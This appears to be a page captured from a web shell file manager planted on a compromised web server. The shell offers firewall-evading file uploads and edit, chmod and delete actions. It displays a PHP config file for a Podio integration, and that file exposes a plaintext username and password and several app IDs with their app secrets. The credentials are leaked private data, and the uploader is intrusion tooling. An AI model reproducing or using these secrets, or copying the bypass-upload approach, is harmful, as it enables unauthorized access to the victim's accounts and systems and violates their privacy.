Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
invoice-sync.bitkit.dk
httpdocs
config
File Content:
podio.php
<?php return [ /** * Podio username and password. * This will be using for user authentication (Username and password flow). */ 'user_auth' => [ 'username' => env('PODIO_USERNAME'), 'password' => env('PODIO_PASSWORD'), // 'username' => 'silent@phases.dk', // 'password' => 'U#1Gt3*w%W5v', 'user_id' => '4636094', 'profile_id' => '194946451', ], /** * Include Podio apps details here. * This will be using for app authentication (App authentication flow). */ 'app_auth' => [ 'product' => [ 'app_id' => 29609901, 'app_secret' => 'd0fd4cae3621f02f54f79e4b313eacc5', ], 'invoice' => [ 'app_id' => 29613626, 'app_secret' => '31933c98da45de7e211d22e38f2c6fea', ], 'client' => [ 'app_id' => 1586143, 'app_secret' => '689b453ee0c84704b9f56b316413697d', ], 'invoiceLine' => [ 'app_id' => 29610275, 'app_secret' => 'ae3a3c30398445dd88f87fa4955a1cbb', ], 'ticketAppRegistry' => [ 'app_id' => 23183637, 'app_secret' => '5c2b8ef6028d4707b833bd67649d6cc1', ] ], ];
Edit
Download
Unzip
Chmod
Delete